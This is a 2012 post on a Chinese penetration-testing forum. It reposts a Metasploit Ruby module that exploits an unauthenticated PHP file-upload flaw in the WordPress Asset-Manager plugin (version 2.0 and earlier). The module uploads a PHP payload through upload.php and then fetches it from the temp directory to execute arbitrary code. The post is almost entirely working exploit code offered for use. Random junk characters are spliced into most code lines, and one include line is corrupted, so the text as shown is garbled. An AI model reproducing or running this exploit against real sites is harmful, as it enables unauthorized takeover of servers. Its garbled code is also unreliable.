找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 WordPress Asset-Manager PHP文件上传漏洞
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 2103|回复: 0
打印 上一主题 下一主题

WordPress Asset-Manager PHP文件上传漏洞

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-12-31 09:22:33 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
这个模块利用Metasploi脆弱漏洞库在WordPress版本Asset-Manager插件2.0以及以下版本发现的。允许上传php文件、一用户可以上传一个文件到一个临时目录没有身份验证,从而导致执行任意代码。
- e4 @1 {6 H) U0 b" B0 ^0 r, `- J4 {$ F0 m% \
##
7 g2 m. `' n7 h3 R" G# This file is part of the Metasploit Framework and may be subject to, s  }# [' o- q6 ^9 O4 I! p
# redistribution and commercial restrictions. Please see the Metasploit. i; h2 ^7 j; n' u9 n
# Framework web site for more information on licensing and terms of use.
) m2 ^8 ]8 q0 d: l  B9 n% G6 m#   http://metasploit.com/framework/  \3 L  R9 f( l( T! N1 _) c3 y
##2 }5 c. |: H1 l. G
: ]  s  z$ ~, H/ @2 m
require 'msf/core'# h' }: t& l" ?* y2 b. J: ~
require 'msf/core/exploit/php_exe'" ?+ ]( ]% m5 a% n+ h# _, n8 W. R

# C( `3 U2 u( g7 B: dclass Metasploit3 < Msf::Exploit::Remote, y2 @# i% D  u+ j  i
  Rank = ExcellentRanking( @6 w/ K$ G$ F9 ^( ^! j3 J; d
3 f5 s+ k3 m2 Z% v2 g& V5 o
  include Msf::Exploit::Remote::HttpClient) V6 S. H/ |. R) C% n
  include Msf::Exploit:hpEXE) r3 J0 k" ^; I
: ]- Y. u( z* K" I
  def initialize(info = {})) I6 U8 p1 [. h# \: J
    super(update_info(info,1 e* K4 z3 b( [2 U
      'Name'           => 'WordPress Asset-Manager PHP File Upload Vulnerability',
0 W$ q1 A2 G( l) s* M' `( _$ g9 k1 \      'Description'    => %q{  l+ u3 s% B6 F/ R
        This module exploits a vulnerability found in Asset-Manager <= 2.0  WordPress
8 C1 p" m* x; [& `' S# K$ r        plugin.  By abusing the upload.php file, a malicious user can upload a file to a/ i: ?7 a1 N9 r, A. \. j# M2 S
        temp directory without authentication, which results in arbitrary code execution.
7 i* a+ a/ l% f5 p5 ~      },
. a, g( e  ]+ M  G- T2 f      'Author'         =>
" b& ?* L2 [8 p9 a1 n        [
, a! i8 p0 p! z          'Sammy FORGIT', # initial discovery
% f+ }) ?8 c: X; h) f+ R0 I1 r          'James Fitts <fitts.james[at]gmail.com>' # metasploit module
- j% }1 r, r- T, u& S4 d, c        ],1 \5 N- ]& e* w6 s+ R
      'License'        => MSF_LICENSE,) K& B, J' Q& S# O- z9 g: B/ C1 K) n3 w
      'References'     =>
9 q* u2 i! ^- q$ |        [, j9 P; E0 V0 Q6 W
          [ 'OSVDB', '82653' ],) p5 w2 G1 p) a- R2 [: ?
          [ 'BID', '53809' ],
" G* K2 e" k& \$ m          [ 'EDB', '18993' ],
4 l# t$ L* {- ~" W  V& `          [ 'URL', 'http:// www.myhack58.com /' ]
4 Y8 I1 p5 N  F- ]        ],( n6 Z) R  M  G/ H
      'Payload'       =>$ [3 y3 t, F/ o7 s8 C. u
        {8 J# ]" [8 P2 V! s" d
          'BadChars' => "\x00",
& R) _+ m" B( {5 K        },) }5 s( s$ e! t# H& O+ Z4 m2 a5 s# J
      'Platform'       => 'php',, C, U! ~- I& X
      'Arch'           => ARCH_PHP,2 P0 l: Q; a1 e& x. L( p* ?
      'Targets'        =>8 Z/ ?0 M( W1 F  W' {) R
        [4 X/ L& {' ^% d- M% h$ j
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
) C( E$ I3 g4 v8 M* }  R          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
! b4 a+ f) \9 q; h        ],
& ]5 t: {. X) M      'DefaultTarget' => 0,, n" t9 L  Z. J2 X. _5 J2 j4 C9 o
      'DisclosureDate' => 'May 26 2012'))
& U& A! N) C# O- b& q : T& Y/ ]# D' G: M
    register_options(
, @0 Y$ a$ }+ z+ z$ y7 l- g& F      [. ~1 b, K# F* b0 {5 l
        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])9 Q8 D9 _4 \5 A: z( W
      ], self.class)
5 W0 B  ^% F2 Y5 C  end+ h- Z/ z; V' D0 f2 b7 F

3 }3 k+ I- _7 ]: Z/ ]" D  def exploit
9 P/ J7 V8 d$ x* S$ p: Y    uri =  target_uri.path; }4 ~3 O0 K- D
    uri << '/' if uri[-1,1] != '/'
  I+ t; U- r9 D" k% R/ e    peer = "#{rhost}:#{rport}"
5 x0 P9 d% j& R  L! C$ G    payload_name = "#{rand_text_alpha(5)}.php"
0 o- t( j# c8 w$ h! L    php_payload = get_write_exec_payload(:unlink_self=>true)7 H$ a/ ~2 D# ^
( r. i3 T2 `  A) ^- m
    data = Rex::MIME::Message.new: [/ L( ]- b/ R6 }5 k/ M. ?' B
    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{payload_name}\"")) _8 A5 f7 e# d* f
    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')8 t/ c. Z- c' v* v% {* g) S- w
$ G5 H+ G1 Q: ^. h  K6 B
    print_status("#{peer} - Uploading payload #{payload_name}")
& I* q5 M( i2 _    res = send_request_cgi({
* z, P4 r0 k9 G" B      'method'  => 'POST',
0 t: w. H7 V' g3 u      'uri'     => "#{uri}wp-content/plugins/asset-manager/upload.php",; ^) l8 A, J- [6 D/ u
      'ctype'   => "multipart/form-data; boundary=#{data.bound}",
" Z3 F/ ^& Z- G* L" G5 V1 O8 J      'data'    => post_data1 A4 s+ ?" i' f. A, }% }
    })
! `5 U  Z/ ^) @8 ]
3 |/ g, J% }6 ~    if not res or res.code != 200 or res.body !~ /#{payload_name}/7 F# U% R: ]3 R1 `3 m  O; V+ t
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
, k+ ~5 c  b7 H: Fend
- M( N! H% ~  o% t) c
: ]; w* b1 I. V. m; k& j+ g( L    print_status("#{peer} - Executing payload #{payload_name}")- x9 `; c) |; _; N; ~
    res = send_request_raw({
9 H# E3 K0 @# _# ]1 H) d. U1 j5 K      'uri'     => "#{uri}wp-content/uploads/assets/temp/#{payload_name}",2 o4 @/ v- N! E" J0 L- v  Z
      'method'  => 'GET'0 X! Z6 ?. Z) f7 l) ~2 o" q% U2 G7 d  I4 y
    })
* u! p7 X& [6 ]; Y . N: L$ f/ w: a
    if res and res.code != 200
& t5 d$ x+ V9 i( A5 H  }      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Execution failed")% p1 _" b" Z9 M9 f7 i; [  {
    end
& u0 V" z1 C+ P9 Z3 m7 l  end1 M; _8 X9 y8 S! [. c- l6 {! O
end4 q) U0 r; L5 F. \/ @5 c
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表